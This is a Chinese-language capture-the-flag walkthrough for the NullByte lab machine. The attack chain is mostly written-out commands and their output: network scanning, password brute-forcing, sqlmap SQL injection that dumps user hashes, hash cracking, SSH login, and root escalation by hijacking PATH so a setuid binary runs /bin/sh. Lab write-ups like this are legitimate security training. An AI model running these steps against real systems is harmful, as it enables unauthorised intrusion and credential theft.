- Recon:
$ netdiscover -r 10.0.2.1/24
10.0.2.136 00:0c:29:92:08:6b 1 60 VMware, Inc.
$ nmap -A 10.0.2.136 -p-
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
...
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
| 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|_ 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
- 將TCP 80 port網頁的圖片載下來分析:
$ exiftool main.gif
...
Comment : P-): kzMb5nVYJw
...
- 連上http://10.0.2.136/kzMb5nVYJw/ 會看到輸入Key欄位
- 使用burp暴力破解,字典檔為rockyou.txt,最後得到elite
- 進入後,看見username輸入欄位,根據輸入後的結果,使用sqlmap跑看看,得到seth database
$ sqlmap -u http://10.0.2.136/kzMb5nVYJw/420search.php?usrtosearch=1 --dbs
...
[20:14:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
[20:14:45] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
- 接著找columns與tables
$ sqlmap -u http://10.0.2.136/kzMb5nVYJw/420search.php?usrtosearch=1 --dump --columns --tables -D seth
Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass | user | position |
+----+---------------------------------------------+--------+------------+
| 1 | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank> |
| 2 | --not allowed-- | isis | employee |
+----+---------------------------------------------+--------+------------+
- 破解ramses密碼:這是Base64 MD5 hash,先在最後面加上等號做base64 decoding,再做MD5 cracking,最後得到密碼omega
- 使用SSH登入,尋找線索:
ssh [email protected] -p777
- 在.bash_history裡發現:
cd /var/www
cd backup/
ls
./procwatch
- 分析procwatch:
- 首先執行procwatch,發現結果與ps很像,因此有可能這支程式包含執行了ps指令 (若要確認是否執行ps,可用gdb分析,https://blog.techorganic.com/2015/08/06/nullbyte-0x01-hacking-challenge/)
$ ./procwatch
PID TTY TIME CMD
19664 pts/0 00:00:00 procwatch
19665 pts/0 00:00:00 sh
19666 pts/0 00:00:00 ps
- 從檔案分析看來,這支程式有帶suid屬性,例如下面-rwsr-xr-x的s字樣
$ ls -alt procwatch
-rwsr-xr-x 1 root root 4932 Aug 2 2015 procwatch
- 或是下面的setuid字樣
$ file procwatch
procwatch: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=17d666a0c940726b29feedde855535fb21cb160c, not stripped
- 有setuid字樣代表啟動的程序的使用者將被臨時改為setuid的owner,程序將擁有owner的權限 (https://yq.aliyun.com/articles/8875)
- 也就是說,假設procwatch裡頭有執行ps程序,若可以把ps換掉為/bin/sh,就變成以root權限執行sh了。
- 新增環境變數/tmp,並放在第一個,讓ps變成執行/tmp底下的假ps,也就是/bin/sh
cd /tmp
cp /bin/sh /tmp/ps
export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
- 再次執行./procwatch,取得root shell
$ ./procwatch
# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)